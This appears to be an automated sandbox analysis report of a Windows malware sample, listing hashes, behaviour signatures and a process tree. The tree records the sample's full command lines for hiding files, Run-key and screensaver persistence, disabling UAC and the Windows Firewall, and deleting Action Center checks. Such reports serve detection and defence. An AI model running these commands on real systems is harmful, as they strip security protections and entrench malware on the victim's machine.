Analysis
-
max time kernel
140s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
09/09/2024, 09:23
General
-
Target
d607dc520a218010b46f50ddfa2c87b4_JaffaCakes118.exe
-
Size
397KB
-
MD5
d607dc520a218010b46f50ddfa2c87b4
-
SHA1
ba28c41b9452f396e3f9acd52094c128e27ef398
-
SHA256
651ab623fd17c7f10d52327cc1421d97e8e099e0b044ab8870f175cdcc0ad839
-
SHA512
0024af340622678b55cb776cde474c8ad01eff624162282907be9a58012e526aff469eec0716f9a7495a7cef4f83f72868948cb0d1beba3215aba13cc346a820
-
SSDEEP
12288:ewNZEWXpjmtW2ebrUSLhbjuQbbPsCDREpjCi:WWXpWvsrU2JuMREpjCi
Score
10/10
Malware Config
Signatures
-
Modifies firewall policy service 3 TTPs 4 IoCs
-
UAC bypass 3 TTPs 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Modifies Windows Firewall 2 TTPs 4 IoCs
-
Sets file to hidden 1 TTPs 24 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 6 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 7 IoCs
-
Drops desktop.ini file(s) 7 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops autorun.inf file 1 TTPs 22 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Control Panel 4 IoCs
-
Modifies Internet Explorer settings 1 TTPs 28 IoCs
-
Modifies registry class 2 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 42 IoCs
Processes
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe1⤵
-
C:\Windows\system32\csrss.exe%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=161⤵
-
C:\Windows\system32\wininit.exewininit.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch3⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}4⤵
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe4⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS3⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted3⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted3⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"4⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs3⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService3⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService3⤵
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe3⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork3⤵
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"3⤵
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"3⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation3⤵
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe3⤵
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe2⤵
-
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe2⤵
-
-
C:\Windows\system32\csrss.exe%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=161⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "129836022615557088091218501753-20952139776226080899381241741212877919-1321391214"2⤵
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scrC:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr /s2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies Control Panel
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\advant.exe"3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" "%appdata%\advant.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\advant.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "%appdata%\advant.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\advant.exe" /f4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\pcclean.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Windows\system32\pcclean.exe"4⤵
- Drops file in System32 directory
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" "%windir%\system32\pcclean.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\pcclean.exe"3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Windows\system32\pcclean.exe"4⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\rawcircle.scr"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" "%appdata%\Microsoft\Windows\rawcircle.scr"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\rawcircle.scr"3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\rawcircle.scr" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c NET START seclogon3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exeNET START seclogon4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 START seclogon5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config upnphost start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config SSDPSRV start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config browser start= auto3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config browser start= auto4⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start upnphost3⤵
-
C:\Windows\SysWOW64\net.exenet start upnphost4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start SSDPSRV3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start SSDPSRV4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start browser3⤵
-
C:\Windows\SysWOW64\net.exenet start browser4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start browser5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
- Modifies firewall policy service
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f4⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe"3⤵
-
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\d607dc520a218010b46f50ddfa2c87b4_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\d607dc520a218010b46f50ddfa2c87b4_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops autorun.inf file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Adds Run key to start application
- Drops autorun.inf file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiSC:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops autorun.inf file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\advant.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS" "%appdata%\advant.exe"4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\advant.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "%appdata%\advant.exe" /f4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "advant" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\advant.exe" /f5⤵
- Adds Run key to start application
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\pcclean.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Windows\system32\pcclean.exe"5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS" "%windir%\system32\pcclean.exe"4⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\pcclean.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Windows\system32\pcclean.exe"5⤵
- Sets file to hidden
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\rawcircle.scr"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS" "%appdata%\Microsoft\Windows\rawcircle.scr"4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\rawcircle.scr"4⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr"5⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\rawcircle.scr" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\rawcircle.scr" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c NET START seclogon4⤵
-
C:\Windows\SysWOW64\net.exeNET START seclogon5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 START seclogon6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config upnphost start= auto5⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SSDPSRV start= auto5⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config browser start= auto4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config browser start= auto5⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start upnphost4⤵
-
C:\Windows\SysWOW64\net.exenet start upnphost5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start SSDPSRV4⤵
-
C:\Windows\SysWOW64\net.exenet start SSDPSRV5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start browser4⤵
-
C:\Windows\SysWOW64\net.exenet start browser5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start browser6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
-
